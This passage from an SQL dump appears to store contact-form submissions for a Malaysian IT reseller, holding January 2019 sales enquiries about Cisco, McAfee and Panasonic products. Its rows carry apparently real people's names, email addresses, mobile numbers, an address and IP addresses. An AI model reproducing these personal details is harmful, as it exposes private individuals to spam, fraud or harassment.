Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Muhamad Juzaime Jusoh\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"muhamadjuzaime@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0139277734\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Juzaime Jusoh\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:37:\"Want to buy Cisco Router &amp; switch\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"57\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-28 20:22:27','42.153.128.170','1'),(40,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Sharil Amir\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"amir@vip-towers.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0197525456\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"Vip Towers Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:36:\"Looking for 3 units of STU300B quote\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-29 14:12:08','202.171.42.194','1'),(41,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Basandan\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"basandan@comverge.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0123358564\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Comverge sdn bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"Are distrubutor for cisco\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-30 11:10:14','223.24.6.57','1'),(42,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"MUHAMMAD RUZNIZAM BIN RUZUKI\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"NIZAM@IPINFRA.COM.MY\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0179307969\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"IPINFRA NETWORKS SDN BHD\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:319:\"Hi and good day, I&#039;m Muhd Ruznizam bin Ruzuki from IpInfra Networks Sdn. Bhd. I would like to inquire about the product below. 1) Renew Cisco Ironport Email Security C170 for 3 years - 1 users 2) Renew Cisco Ironport Email Security C170 for 3 years - 500 users Thank you, Muhd Ruznizam bin Ruzuki, Tel : 0179307969\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"11\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-30 13:27:31','60.54.120.160','1'),(43,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Liew Wan Heng\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"whliew@gersb.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0176832623\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"Golden Eagle Realty\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:84:\"We want to buy WebEx Video Conference System, can you send me the package price list\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-30 17:03:46','211.24.96.204','1'),(44,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"NASSRUL NASIR\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"nassrul@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0124966144\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"Keris Prima Enterprise\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"Bandar Sri Putra,Kajang,Selangor\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"TOUGHPAD FZ-G1\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"Can u give me the prize\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-30 19:47:42','113.210.177.51','1'),(45,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"NASSRUL NASIR\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"nassrul@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0124966144\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"Keris Prima Enterprise\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"Bandar Sri Putra,Kajang,Selangor\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"TOUGHPAD FZ-G1\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"Can u give me the prize\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-30 19:48:02','113.210.177.51','1'),(46,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Nurshafiqah Saad\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"fiqa@techikara.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0175805727\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"Techikara Engineering Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:149:\"Hi, may i know how to request price quotation on the services McAfee Model MFE Net Sec M-2950 and Cisco Ironport Model C170 Email Security Appliance?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"17\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-31 16:43:21','60.48.170.70','1'),(47,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Nurshafiqah Saad\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"fiqa@techikara.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0175805727\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"Techikara Engineering Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:149:\"Hi, may i know how to request price quotation on the services McAfee Model MFE Net Sec M-2950 and Cisco Ironport Model C170 Email Security Appliance?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"17\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-01-31 16:46:39','60.48.170.70','1'),(48,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact 